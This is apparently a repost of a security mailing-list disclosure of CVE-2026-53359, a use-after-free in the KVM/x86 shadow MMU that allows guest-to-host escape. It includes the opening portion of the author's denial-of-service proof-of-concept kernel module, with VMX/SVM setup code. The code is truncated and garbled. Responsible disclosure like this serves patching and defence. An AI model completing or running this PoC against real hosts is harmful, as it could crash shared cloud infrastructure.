Januscape: Guest-to-Host Escape in KVM/x86 (CVE-2026-53359)

aberoham1 pts0 comments

oss-security - Januscape: Guest-to-Host Escape in KVM/x86 (CVE-2026-53359)

Products

Openwall GNU/*/Linux server OS<br>Linux Kernel Runtime Guard<br>John the Ripper password cracker

Free & Open Source for any platform<br>in the cloud<br>Pro for Linux<br>Pro for macOS

Wordlists for password cracking<br>passwdqc policy enforcement

Free & Open Source for Unix<br>Pro for Windows (Active Directory)

yescrypt KDF & password hashing<br>yespower Proof-of-Work (PoW)<br>crypt_blowfish password hashing<br>phpass ditto in PHP<br>tcb better password shadowing<br>Pluggable Authentication Modules<br>scanlogd port scan detector<br>popa3d tiny POP3 daemon<br>blists web interface to mailing lists<br>msulogin single user mode login<br>php_mt_seed mt_rand() cracker

Services<br>Publications

Articles<br>Presentations

Resources

Mailing lists<br>Community wiki<br>Source code repositories (GitHub)<br>File archive & mirrors<br>How to verify digital signatures<br>OVE IDs

What's new

Follow @Openwall on Twitter for new release announcements and other news

[ [next>] [day] [month] [year] [list]

Message-ID:<br>Date: Tue, 7 Jul 2026 01:00:23 +0900<br>From: Hyunwoo Kim<br>To: oss-security@...ts.openwall.com<br>Cc: imv4bel@...il.com<br>Subject: Januscape: Guest-to-Host Escape in KVM/x86 (CVE-2026-53359)

Hi,

The embargo agreed with the maintainers of<br>linux-distros@...openwall.org has expired, so I am posting this report.

This is a report on "Januscape (CVE-2026-53359)", a KVM escape<br>vulnerability that lets a guest escape to the host on KVM/x86,<br>that is, on both Intel and AMD hosts. Januscape is a use-after-free<br>vulnerability in the shadow MMU emulation of KVM/x86. It can trigger<br>the bug with guest-side actions alone to corrupt the host kernel's<br>shadow page, and it can threaten the guest-host isolation of KVM/x86<br>hosts that accept untrusted guests and expose nested virtualization,<br>particularly multi-tenant x86 public clouds (GCP, AWS, etc.).

Also, on distributions such as RHEL, /dev/kvm is world-writable<br>(0666), so an unprivileged user could also use this vulnerability as<br>a reliable LPE to gain root, though that is a minor impact compared<br>to the host escape.

In fact, Januscape was successfully used as a 0-day exploit in<br>Google kvmCTF.

CVE-2026-53359 was reported to security@...nel.org and has been<br>patched in mainline, and it had been latent for about 16 years:<br>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=81ccda30b4e83d8f5cc4fd50503c44e3a33abfeb

Additionally, I am attaching a DoS PoC. For detailed information<br>about the vulnerability and follow-up updates, please see:<br>https://januscape.io

Best regards,<br>Hyunwoo Kim

/*<br>* Guest-to-Host DoS in KVM/x86 (CVE-2026-53359)<br>* KVM x86 MMU kvm_mmu_get_child_sp() role-mismatch shadow-page reuse -> pte_list_remove() host DoS.<br>* Target: Linux x86_64, KVM shadow MMU before the get_child_sp() role.word reuse check.<br>* Dual-arch: insmod poc.ko = Intel VMX/EPT (default), amd=1 = AMD SVM/NPT; rmmod kvm_intel/kvm_amd first.<br>* Copyright (c) 2026 Hyunwoo Kim (@v4bel)<br>*/

#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include<br>#include

/* v7.1 (1aea80dd42cf) renamed vmcb.nested_ctl -> misc_ctl and dropped SVM_NESTED_CTL_NP_ENABLE. */<br>#ifndef SVM_NESTED_CTL_NP_ENABLE<br>#define SVM_NESTED_CTL_NP_ENABLE (1ULL = KERNEL_VERSION(7, 1, 0)<br>#define VMCB_NP_CTL(c) ((c)->misc_ctl)<br>#else<br>#define VMCB_NP_CTL(c) ((c)->nested_ctl)<br>#endif

MODULE_LICENSE("GPL");<br>MODULE_DESCRIPTION("KVM guest->host DoS (dual-arch: Intel VMX/EPT default, amd=1 -> AMD SVM/NPT)");<br>MODULE_AUTHOR("Hyunwoo Kim (@v4bel)");

static int amd = 0;<br>module_param(amd, int, 0444);<br>static int nvcpu = 8;<br>module_param(nvcpu, int, 0444);<br>static int dwell = 256;<br>module_param(dwell, int, 0444);<br>static int run_ms = 600000;<br>module_param(run_ms, int, 0444);<br>static int diag = 1;<br>module_param(diag, int, 0444);<br>static int nflood = 0;<br>module_param(nflood, int, 0444);

#define EPT_RWX 0x7ULL<br>#define EPT_MT_WB (6ULL > 32)));<br>static inline u64 rd_cr4(void)<br>u64 v;<br>asm volatile("mov %%cr4,%0" : "=r"(v));<br>return v;<br>static inline void wr_cr4(u64 v)<br>asm volatile("mov %0,%%cr4" ::"r"(v) : "memory");<br>static inline u64 rd_cr3(void)<br>u64 v;<br>asm volatile("mov %%cr3,%0" : "=r"(v));<br>return v;

static inline int vmxon_(u64 pa)<br>u8 e;<br>asm volatile("vmxon %1; setna %0" : "=r"(e) : "m"(pa) : "cc", "memory");<br>return e;<br>static inline void vmxoff_(void)<br>asm volatile("vmxoff" ::: "cc");<br>static inline int vmclear_(u64 pa)<br>u8 e;<br>asm volatile("vmclear %1; setna %0"<br>: "=r"(e)<br>: "m"(pa)<br>: "cc", "memory");<br>return e;<br>static inline int vmptrld_(u64 pa)<br>u8 e;<br>asm volatile("vmptrld %1; setna %0"<br>: "=r"(e)<br>: "m"(pa)<br>: "cc", "memory");<br>return e;<br>static inline int vmwrite_(u64 f, u64 v)<br>u8 e;<br>asm volatile("vmwrite %2,%1; setna %0"<br>: "=r"(e)<br>: "r"(f), "r"(v)<br>: "cc");<br>return e;<br>static inline u64 vmread_(u64 f)<br>u64 v;<br>asm volatile("vmread %1,%0" : "=r"(v) : "r"(f) : "cc");<br>return v;<br>static u32 adj(u32 msr, u32 want)<br>u64 m = rdmsr_(msr);<br>return (u32)(((want...

include static host inline volatile guest

Related Articles